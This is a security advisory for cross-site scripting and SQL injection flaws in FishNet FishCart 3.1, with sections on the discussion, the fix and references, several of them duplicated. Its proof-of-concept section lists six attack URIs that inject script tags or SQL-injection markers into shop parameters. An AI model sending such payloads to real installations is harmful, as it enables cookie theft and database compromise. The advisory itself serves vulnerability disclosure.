FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
BID:13499
Info
FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
| Bugtraq ID: | 13499 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | Jan 25 2007 04:26PM |
| Credit: | dcrab <[email protected]> is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
FishNet FishCart 3.1 |
| Not Vulnerable: |
FishNet FishCart 3.2 RC1 |
Discussion
FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
A successful exploit of the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input.
A successful exploit of the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Exploit / POC
FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
An attacker can exploit these issues through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script>
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
An attacker can exploit these issues through a web client.
The following proof-of-concept URIs are available:
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst='"><script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
http://www.example.com/demo31/upstracking.php?trackingnum='"><script>alert(document.cookie)</script>&reqagree=checked&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)</script>&m=
http://www.example.com/demo31/upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)</script>
http://www.example.com/demo31/display.php?cartid=200505024231092&zid=1&lid=1&nlst=y&olimit=0&cat=&key1=&psku='SQL_INJECTION
http://www.example.com/demo31/upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION
Solution / Fix
FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
Solution:
The vendor released an update to address these issues. Please see the references for more information.
Solution:
The vendor released an update to address these issues. Please see the references for more information.
References
FishNet FishCart Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
References:
References:
- FishCart Homepage (FishNet Inc.)
- Re: [fishcart] concerned about security (FisnNet Inc.)
- Multiple SQL injections and XSS in FishCart 3.1 (dcrab
)